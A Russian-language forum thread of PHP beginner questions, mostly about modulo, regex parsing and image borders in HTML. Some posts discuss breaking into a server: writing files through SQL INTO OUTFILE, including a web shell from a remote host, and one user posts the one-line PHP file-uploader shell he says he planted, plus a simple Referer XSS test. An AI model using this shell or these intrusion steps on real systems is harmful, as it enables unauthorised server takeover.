[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. Gadik

    Gadik Elder - Старейшина

    Joined:
    29 May 2006
    Messages:
    97
    Likes Received:
    19
    Reputations:
    0
    Добрый день. Подскажите пожалуйста что означает выражение типа:

    for($i=$count%$INDEX_COLUMNS;...

    а именно знак % что в данном случае обозначает?

    Заранее благодарен.
     
  2. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Операция деления по модулю
     
  3. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Возможно ли раскодировать PHP фаил?

    Ссылка на фаил: http://dump.ru/file/1502472
     
  4. c0m

    c0m Elder - Старейшина

    Joined:
    26 Jan 2007
    Messages:
    37
    Likes Received:
    3
    Reputations:
    0
    groundhog
    наверно проще попросить php код, который я смогу выполнить через sql и с которым я смогу заливать файлы
     
  5. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Как выпарсить скобку и ковычку?

    Есть текст id=19296698');">
    как выдрать только цыфры??
     
  6. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    Ужс %)

    только проверяй по белому списку расширений...


    Zitt, можно и регуляркой:
    PHP:
    $str 'id=19296698\');">';
    preg_match('#id\=([0-9]+)\'\)\;\"\>#i'$str$res);
    print_r($res);
     
    #8186 Chaak, 5 Feb 2009
    Last edited: 5 Feb 2009
    2 people like this.
  7. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    c0m, ты пойми, что с помощью SQL ты PHP-код не выполнишь никак... Только можешь записать его в файл с поомщью INTO OUTFILE, но если у тебя нету прав на это (в 99% случаев их нет), то ничего ты не сделаешь в плане внедрения в файловую систему.
     
    1 person likes this.
  8. Ink-developer

    Ink-developer Banned

    Joined:
    21 Jan 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Народ подскажите если в файле php на сервере содержится нижеследующий код это является уязвимостью? Если да то что необходимо переслать в referer чтобы выполнить произвольный код.
    PHP:
    <?
    $referer=$_SERVER['HTTP_REFERER'];
    echo
    "$referer";
    ?>
     
  9. c0m

    c0m Elder - Старейшина

    Joined:
    26 Jan 2007
    Messages:
    37
    Likes Received:
    3
    Reputations:
    0
    есть права на запись через sql
     
    #8189 c0m, 5 Feb 2009
    Last edited: 5 Feb 2009
  10. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    да, это уязвимость, попробуй: <h1>Все на кур!</h1>
     
  11. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Ну так найди диру куда можешь писать и запиши в файл инклуд какого-нибудь веб-шелла с удалённого хоста. Это во-первых, во-вторых попробуй wget
     
  12. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    в вышеследующем коде нет ничего, кроме XSS
     
  13. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    ты никак не выполнишь PHP-код... Блин, ну черти! Ну поймите - PHP код выполняется на стороне сервера, в вашем же случае только клиентская сторона может быть уязвима. И вообще с такими вопросам марш в "Уязвимости".
     
    2 people like this.
  14. c0m

    c0m Elder - Старейшина

    Joined:
    26 Jan 2007
    Messages:
    37
    Likes Received:
    3
    Reputations:
    0
    залил )
    PHP:
    <form enctype=multipart/form-data  method=post> <input name=userfile type=file> <input type=submit name=go></form> <?php if(isset($_POST[go]))move_uploaded_file($_FILES[userfile][tmp_name],$_FILES[userfile][name]); ?>
    з.ы. через инклуд не получалось

    Спасибо
     
  15. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Вопрос:

    Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
     
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    <img src=site.ru/img.jpg></img>
     
    1 person likes this.
  17. blaga

    blaga Elder - Старейшина

    Joined:
    23 Mar 2006
    Messages:
    884
    Likes Received:
    273
    Reputations:
    106
    если память мне не изменяет то в теге img есть атрибут border=0
    или что то в этом духе.. уже забыл... :(
     
  18. blaga

    blaga Elder - Старейшина

    Joined:
    23 Mar 2006
    Messages:
    884
    Likes Received:
    273
    Reputations:
    106
    mailbrush, в чем прикол закрывающего img ?
     
    1 person likes this.
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Хз, по привычке =)

    Да, но по дефолту он так и стоит (0). Чел наверное сделал как-то так (пишу по памяти):
    HTML:
    <a href=site.ru/img.jpg><img src=site.ru/img.jpg></img></a>
     
  20. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Jer1cho, да да , по дефолту стоит обводка 1px если не ошибаюсь.
    Можно еще так сделать:
    HTML:
    <img src="http://forum.antichat.ru/antichat/pic/logo.gif" style="border: solid 0px;" />
    а закрывающий тег, необязательный в html ставят для совместимости с xhtml...
     
Thread Status:
Not open for further replies.